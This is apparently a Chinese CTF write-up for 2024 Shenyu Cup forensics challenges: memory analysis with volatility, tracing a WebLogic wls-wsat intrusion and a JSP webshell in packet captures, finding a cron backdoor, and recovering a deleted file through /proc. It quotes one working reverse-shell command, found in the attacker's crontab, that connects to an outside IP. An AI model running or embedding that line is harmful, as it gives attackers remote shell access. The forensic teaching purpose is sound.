2024深育杯大学生网络安全大赛—网络安全攻防大赛[初赛] 部分Write up

Misc

【任务二】内网攻击
题目介绍:

问题2:攻击者远程服务器监听所用的端口是()?请提交flag,例如端口号为80,则提交Sangfor{80}

解题步骤:

题目附件给了一个raw文件

就可以得知这题是内存取证题

我们目前常用的取证:volatility、Lovelymem

volatility:https://volatilityfoundation.org/
Lovelymem:https://github.com/Tokeii0/LovelyMem

volatility解:

先查看系统镜像

python2 vol.py -f baka.raw imageinfo
在这里插入图片描述
题目让我们找端口,可以联想到去看网络连接状态

python2 vol.py -f baka.raw --profile=Win7SP1x64 netscan
在这里插入图片描述
flag:Sangfor{11451}

Lovelymem解:

用工具加载镜像

在进行网络扫描
在这里插入图片描述

等同 volatility 的 netscan
在这里插入图片描述
flag:Sangfor{11451}

Reverse

【任务一】miner
题目介绍:

小刘是一家单位信息科的技术工程师,这天他看到设备上有台机器,存在挖矿外连的告警,但是小刘发现,主机是一台服务器,他就想着这个服务器为什么会平白无故的进行挖矿,他自己先终止了挖矿进程,但是过不久后,告警再次复发,请你帮助他进行这次的安全排查工作。

问题1:小刘发现服务器存在外连的主要原因,是因为web漏洞导致,你能帮他定位到漏洞失陷点的接口嘛?失陷的时间点是什么时候?请提交"漏洞接口+失陷时间"的md5值,例如,漏洞接口为/upload/1.php,北京时间为2001-01-01 01:01,则计算md5(/upload/1.php+2001-01-01 01:01),flag{2f15b6eb1c3f63b98dc63d38ef0ff985}。

解题步骤:

题目附件给了一个流量包,还有一个服务器

翻看流量包会发现攻击者一直做的操作都是404
在这里插入图片描述

翻到流量包的最后 可以发现状态200的流量包

在这里插入图片描述

过滤/wls-wsat/CoordinatorPortType11

在这里插入图片描述

追踪到第一个流量里面去看看

在这里插入图片描述

可以看到执行的 whoami 命令 并成功回显了

那么这第一个流量包就是失陷的时间

在流量包中 他的时间是 2024年11月14日 05:12分

流量包中是utc时间 但是题目要求的是北京时间

往时间上面 +8 小时 或者 流量包中 Frame里面看中国标准时间

在这里插入图片描述

接口:/wls-wsat/CoordinatorPortType11

时间:2024-11-14 13:12

/wls-wsat/CoordinatorPortType11+2024-11-14 13:12

flag:flag{a507340db662534ba1be008751ab875f}

Pwn

【任务一】木马排查
题目介绍:

小王是一家it公司的运维管理员,这运维抓包期间,发现自己部署的监控程序显示,服务器执行异常命令,但这不是小王的操作,但是小王不知道该如何排查这个异常命令是怎么执行的。现在需要各位网络安全专家协助小王,根据攻击流量包以及登机排查本次执行异常命令时间。

问题1:攻击者的ip是多少?落地的文件名是什么?第一次连接恶意文件的北京时间是多少?flag{md5(ip+文件名+???-??-?? ??:??)},实例,flag{md5(127.0.0.1+a.exe+2001-10-10 10:10)}

解题步骤:

题目也是给了一个流量包和一个服务器

和前面那道题一样 前面的流量都是404

但是在后面可以发现很多 userLogin.jsp 是200的

在这里插入图片描述

连上服务器在/usr/local/tomcat/webapps/目录下发现 login.war

login.war里面的文件就是 userLogin.jsp

下载解压后发现被火绒杀掉了

在这里插入图片描述

或者服务器 翻看 userLogin.jsp 也能发现是后门文件

流量包中过滤 userLogin.jsp

在这里插入图片描述

前面两个是上传的流量

那么上传后第一个就是连接的时间

ip:192.168.233.1

落地文件:userLogin.jsp

时间:2024-11-13 23:53

192.168.233.1+userLogin.jsp+2024-11-13 23:53

flag:flag{4de6c855b6cf3593e762b992e7de1fe8}

【任务二】木马排查
题目介绍:

攻击者避免恶意文件被删除,丢失权限,创建了个后门,定期外连,执行外连的指令是?请提交flag,flag{md5(外连指令)}。

解题步骤:

定期外连,联想到定时任务

crontab -l

在这里插入图片描述

bash -i >& /dev/tcp/192.168.233.133/8888 0>&1

flag:flag{7d5a0e505b4fd47553a29872cd140dc2}

【任务四】木马排查
题目介绍:

管理员发现root目录下的一个文件被删除了,请你帮他恢复该文件,并获取到文件内容flag{文件内容}

解题步骤:

查看历史命令 history​ 可以发现 /root/flag.txt
在这里插入图片描述

但是在服务器中并没有发现flag.txt这个文件

在 startup.sh 文件中 发现它把 flag.txt 删除了

在这里插入图片描述

linux恢复删除的文件可以用 lsof

https://blog.csdn.net/m0_60721823/article/details/139943385?fromshare=blogdetail&sharetype=blogdetail&sharerId=139943385&sharerefer=PC&sharesource=cqy947639882&sharefrom=from_link

但是服务器上没有装

apt-get install lsof ​安装lsof

lsof | grep flag.txt​ 查看 flag.txt 进程

然后进入对应进程的目录 恢复flag.txt

在这里插入图片描述

这里进程是1 所以进入 /proc/1/fd

ll ​3是指向flag.txt

所以 cp 3 恢复的路径

最后查看flag.txt
在这里插入图片描述

flag:flag{congratulation}

END

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值